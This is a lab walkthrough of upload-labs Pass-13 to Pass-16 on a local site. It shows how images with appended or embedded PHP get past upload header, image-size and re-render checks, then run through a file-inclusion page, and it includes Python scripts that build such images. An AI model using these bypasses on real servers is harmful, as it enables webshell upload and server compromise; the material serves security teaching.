Network security - file upload content check bypass
2022-07-24 13:41:00 【Beluga】
File upload content check bypasses
Step 1: open the network topology and start the experimental virtual machine.
Step 2: open the Chrome browser, enter http://127.0.0.1 in the address bar to reach the upload-labs page, then click Pass-13 in the left navigation bar to enter level 13.

The task prompt requires the uploaded file to be a .jpg, .png or .gif that carries a one-line PHP shell or webshell, i.e. an image Trojan ("picture horse"). Click the view source code button.

On the fourth line of the code, $bin = fread($file, 2); reads the first two bytes of the file. Further down, unpack() splits that byte string into variables, storing the two byte values in chars1 and chars2, and intval() turns them into a decimal number, so after this code the two header bytes are represented as decimal information. Next comes a switch: if the value matches jpg, png or gif the file is allowed and the code jumps into the upload routine; otherwise the type is judged unknown and the upload fails. Because the program decides the file type from the first two bytes alone, a real image can be uploaded directly with PHP appended to it.

The operation is as follows: open pentestbox and run cd C:\Users\Administrator\Desktop\steganography Images\gif,

create a file shell.php whose content is <?php phpinfo(); ?>, then run copy cat_tldzFZS.jpg /b + shell.php /a webshell.jpg to splice the image and the Trojan together (the image is copied as binary, the PHP file appended after it).

Move the image to the desktop, return to the upload page, and upload it with the browser proxy enabled so that Burp Suite captures the request.

To observe the upload path conveniently, right-click the request and choose Send to Repeater, then click Go in Repeater to send the request.

The upload succeeds; turn off the proxy.

Step 3: this vulnerability cannot be exploited on its own; it has to be combined with a file inclusion vulnerability. Because the website is local, we simulate this process directly on it: enter C:\Program Files (x86)\upload-labs\WWW and write a simple page that contains a file inclusion vulnerability.

This file has already been written into the website, so you do not need to create it when doing the experiment yourself; visiting http://127.0.0.1/include.php directly is enough.

Next, construct the exploit by appending ?file=upload/8620200104160811.jpg to the end of that URL and revisit the page.

Exploitation succeeds.
Step 4: go back to the home page of the website and click Pass-14 in the left navigation bar to enter level 14. It is again an image Trojan upload; click the show source code button to view the source.

Here getimagesize() is used to obtain the file type, and the image Trojan still bypasses it. A brief note on getimagesize(): it reads the image header to determine the dimensions and type, so a real image with PHP appended after it is still reported as a valid image.

Upload the image Trojan from the previous step and look up the name of the uploaded file in the /upload/ folder.

Visit /include.php and construct /include.php?file=upload/9120200104164552.jpeg.

Step 5: return to the home page again and click Pass-15 in the left navigation bar to enter level 15. It is still an image Trojan upload; clicking the show source code button shows that the checking function has changed.

The exif_imagetype() function is used: it reads the first bytes of the image and checks its signature. The bypass is the same as for Pass-13, so the reproduction is omitted; it proceeds exactly as in the experiment above.
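The three checks of Pass-13, Pass-14 and Pass-15 all look only at the start of the file, which is why one image Trojan defeats all of them. The script below is an added example for this write-up, not code from upload-labs: TINY_GIF is a constructed, complete 1x1 GIF89a; lab_file_type() re-implements the two-byte check the page describes for Pass-13 (fread two bytes, unpack as two unsigned chars, concatenate their decimal values, switch); image_signature_type() and gif_image_size() imitate what exif_imagetype() and getimagesize() consult for a GIF (signature and logical screen descriptor), which is an assumption about those functions' relevant behaviour rather than a port of PHP's source.

```python
"""Image Trojan ("picture horse") builder and the header checks it defeats.

Added example, not upload-labs code. Checks are Python re-implementations /
approximations of the PHP behaviour described in the write-up (assumption).
"""
import struct

# Constructed sample: a complete, valid 1x1 transparent GIF89a (43 bytes).
TINY_GIF = (
    b"GIF89a"                                    # signature + version
    b"\x01\x00\x01\x00"                          # logical screen 1 x 1
    b"\x80\x00\x00"                              # packed: global colour table, 2 entries
    b"\x00\x00\x00\xff\xff\xff"                  # colour table: black, white
    b"\x21\xf9\x04\x01\x00\x00\x00\x00"          # graphic control extension (transparent)
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor
    b"\x02\x02\x44\x01\x00"                      # LZW min code size + one data sub-block
    b"\x3b"                                      # trailer
)

PAYLOAD = b"<?php phpinfo(); ?>"

# The lab's switch values: decimal of byte 1 concatenated with decimal of byte 2.
LAB_TYPE_CODES = {255216: "jpg", 13780: "png", 7173: "gif"}  # FF D8, 89 50, 47 49


def lab_file_type(data: bytes) -> str:
    """Pass-13 logic: fread 2 bytes, unpack as two unsigned chars, intval of the
    concatenated decimal strings, switch. Everything after byte 2 is ignored."""
    if len(data) < 2:
        return "unknown"
    c1, c2 = struct.unpack("BB", data[:2])
    return LAB_TYPE_CODES.get(int(f"{c1}{c2}"), "unknown")


def image_signature_type(data: bytes) -> str:
    """exif_imagetype()-style check: compare the leading bytes against the full
    magic strings instead of a lossy decimal concatenation."""
    if data.startswith(b"\xff\xd8\xff"):
        return "jpg"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return "unknown"


def gif_image_size(data: bytes):
    """getimagesize()-style parse for GIF: width and height come from the
    logical screen descriptor (bytes 6-9, little endian); nothing past the
    header is consulted, so appended PHP does not change the result."""
    if data[:6] not in (b"GIF87a", b"GIF89a") or len(data) < 10:
        return None
    width, height = struct.unpack("<HH", data[6:10])
    return width, height, "gif"


def make_image_trojan(image: bytes, php: bytes = PAYLOAD) -> bytes:
    """Equivalent of `copy image /b + shell.php /a out`: real image first, PHP after."""
    return image + php


def php_survives(data: bytes, php: bytes = PAYLOAD) -> bool:
    """True if the PHP open tag and code are still present in the file, which is
    what include.php relies on when it includes the uploaded image."""
    return php in data


if __name__ == "__main__":
    trojan = make_image_trojan(TINY_GIF)
    with open("webshell.gif", "wb") as fh:
        fh.write(trojan)
    print("lab two-byte check  :", lab_file_type(trojan))
    print("signature check     :", image_signature_type(trojan))
    print("getimagesize-like   :", gif_image_size(trojan))
    print("PHP still present   :", php_survives(trojan))
    # Side effect of concatenating decimals: 0x07 0xAD also reads as "7173".
    print("07 AD classified as :", lab_file_type(b"\x07\xad"))
```

Note the last line: because the Pass-13 check concatenates the two decimal values as strings, the byte pair 0x07 0xAD produces "7173" just as 0x47 0x49 does, so the check accepts files that no GIF decoder would. Comparing the raw magic bytes, as image_signature_type() does, avoids that collision, but the appended PHP still passes every one of these checks; only a re-encode (Pass-16) disturbs it.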
Step 6: go to the home page and click Pass-16 in the left navigation bar to enter level 16. It is still an image Trojan upload; click the show source code button to view the source.

Reviewing the code of the whole file: it checks the suffix and the Content-Type, uses imagecreatefromgif/imagecreatefromjpeg/imagecreatefrompng to judge whether the file is a GIF, JPEG or PNG image, and finally re-renders the image a second time. Take a look at the part of the file that handles GIF detection.

Line 61 checks, through the two variables $fileext and $filetype, whether the file is in GIF format. Line 62 uses move_uploaded_file() as the condition: if the file is successfully moved to $target_path, execution enters the secondary rendering code, otherwise the upload fails.

The idea for cracking this level is roughly: first upload a GIF image, then compare the re-rendered GIF served back by the site with the local original, find the data block that is identical in both, and insert the phpinfo() code there, because bytes the renderer left untouched once will be left untouched again.
Step 7: first upload an ordinary GIF image. Enter the path C:\test, copy the image test.gif to the desktop, rename it 1.gif, then upload 1.gif on the web page.

Visit /upload/.

Click 4575.gif to open the image and save the file locally as 2.gif.

Then open 2.gif with Hex Editor Neo and compare it with 1.gif. The comparison shows that the contents of the two images are identical at the a0 line (offset 0xa0).

Directly overwrite the bytes at the a0 position of 2.gif with <?php phpinfo(); ?>.

Finally save the file as 3.gif and upload it. Visit the upload directory to get the name of the uploaded file.

Include this file with include.php.
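The hex-editor comparison in steps 6 and 7 can be automated: find every offset where the downloaded 2.gif still matches the local 1.gif, pick a run long enough for the payload, and overwrite (not insert) the payload there so every later structure offset stays unchanged. The following is an added example for this write-up, not code from upload-labs. The two byte strings returned by constructed_pair() are constructed stand-ins for 1.gif and 2.gif in which the server kept the header, logical screen descriptor and global colour table but re-encoded the image data (the data sub-block contents are placeholder bytes, not decodable LZW); real files are compared the same way, and the offset the page found by hand (0xa0) is what identical_runs() reports for them.

```python
"""Locate bytes that survive the server's second render of a GIF (Pass-16) and
plant PHP there.

Added example, not upload-labs code. constructed_pair() builds constructed
stand-ins for the original (1.gif) and the re-rendered download (2.gif).
"""
GIF_HEADER_LEN = 13  # 6-byte signature/version + 7-byte logical screen descriptor
PAYLOAD = b"<?php phpinfo(); ?>"


def identical_runs(original: bytes, rendered: bytes, min_len: int,
                   min_offset: int = GIF_HEADER_LEN):
    """Return [(offset, length), ...] for every run where both files hold the
    same bytes at the same offset, at least min_len long and starting at or
    after min_offset (the header must stay intact for the file to parse).
    Only such runs are safe to write into: bytes the re-encoder rewrote once
    will be rewritten again on the next upload."""
    runs = []
    limit = min(len(original), len(rendered))
    start = None
    for i in range(min_offset, limit + 1):
        same = i < limit and original[i] == rendered[i]
        if same and start is None:
            start = i
        elif not same and start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None
    return runs


def inject(rendered: bytes, offset: int, payload: bytes = PAYLOAD) -> bytes:
    """Overwrite payload at offset, keeping the file length unchanged. This is
    what editing 2.gif in place in a hex editor does."""
    if offset + len(payload) > len(rendered):
        raise ValueError("payload does not fit at that offset")
    return rendered[:offset] + payload + rendered[offset + len(payload):]


def build_3_gif(original: bytes, rendered: bytes, payload: bytes = PAYLOAD) -> bytes:
    """Produce 3.gif: the re-rendered copy with payload written into the first
    region that the renderer left byte-identical to the original."""
    runs = identical_runs(original, rendered, len(payload))
    if not runs:
        raise RuntimeError("no stable region large enough for the payload; use a bigger GIF")
    offset, _ = runs[0]
    return inject(rendered, offset, payload)


def constructed_pair():
    """Constructed stand-ins for 1.gif and 2.gif (assumption: the renderer kept
    the header, screen descriptor and 256-entry global colour table and only
    re-encoded the image data). Image data bytes are placeholders, not LZW."""
    header = b"GIF89a" + b"\x40\x00\x40\x00" + b"\xf7\x00\x00"   # 64x64, 256-colour table
    colour_table = bytes(range(256)) * 3                         # 768 bytes, identical in both
    descriptor = b"\x2c\x00\x00\x00\x00\x40\x00\x40\x00\x00"     # image descriptor
    original_data = b"\x08\x10" + bytes(range(0, 16)) + b"\x00"  # min code size, block
    rendered_data = b"\x08\x10" + bytes(range(16, 32)) + b"\x00" # re-encoded: differs
    trailer = b"\x3b"
    return (header + colour_table + descriptor + original_data + trailer,
            header + colour_table + descriptor + rendered_data + trailer)


if __name__ == "__main__":
    original, rendered = constructed_pair()
    for offset, length in identical_runs(original, rendered, len(PAYLOAD)):
        print(f"stable run at 0x{offset:x}, {length} bytes")
    three = build_3_gif(original, rendered)
    with open("3.gif", "wb") as fh:
        fh.write(three)
    print("payload at 0x%x, header intact: %s" %
          (three.find(PAYLOAD), three[:6] == b"GIF89a"))
```

With real files, pass open("1.gif", "rb").read() and open("2.gif", "rb").read() to build_3_gif(), upload the result, download it again and run identical_runs() on the new download against 3.gif to confirm the payload region survived the second render; if the only stable runs lie inside the 13-byte header, a larger GIF with a global colour table is needed.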
